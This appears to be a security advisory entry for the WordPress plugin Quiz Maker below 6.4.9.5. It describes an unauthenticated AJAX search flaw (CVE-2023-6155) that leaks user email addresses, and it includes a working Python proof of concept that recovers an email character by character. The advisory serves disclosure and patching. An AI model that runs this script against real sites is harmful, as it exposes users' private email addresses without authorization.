Lucene search
Krzysztof Zając (CERT PL)WPEX-ID:C62BE802-E91A-4BCF-990D-8FD8EF7C9A28HistoryNov 30, 2023 - 12:00 a.m.
Quiz Maker < 6.4.9.5 - Unauthenticated Email Address Disclosure
2023-11-3000:00:00
Krzysztof Zając (CERT PL)
28
quiz maker
unauthenticated
email address disclosure
wp admin ajax
Description The plugin does not adequately authorize the ays_quiz_author_user_search AJAX action, allowing an unauthenticated attacker to perform a search for users of the system, ultimately leaking user email addresses.
import string
import requests
base_url = 'http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=ays_quiz_author_user_search&search='
id_to_find = 1
letter_candidates = string.ascii_lowercase + string.digits + '-_.'
email = '@'
# Find letters after @
while True:
print("current email", email)
for letter in letter_candidates:
query = email + letter
data = requests.get(base_url + query).json()
if id_to_find in [item['id'] for item in data['results']]:
email = query
break
else:
break
# Find letters before @
while True:
print("current email", email)
for letter in letter_candidates:
query = letter + email
data = requests.get(base_url + query).json()
if id_to_find in [item['id'] for item in data['results']]:
email = query
break
else:
breakRelated
prion
prion
Code injection
2023-12-26 19:15:00
cvelist
cvelist
nvd
nvd
CVE-2023-6155
2023-12-26 19:15:08
wpvulndb
wpvulndb
Quiz Maker < 6.4.9.5 - Unauthenticated Email Address Disclosure
2023-11-30 00:00:00
cve
cve
CVE-2023-6155
2023-12-26 19:15:08
6.9 Medium
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
31.1%
Related for WPEX-ID:C62BE802-E91A-4BCF-990D-8FD8EF7C9A28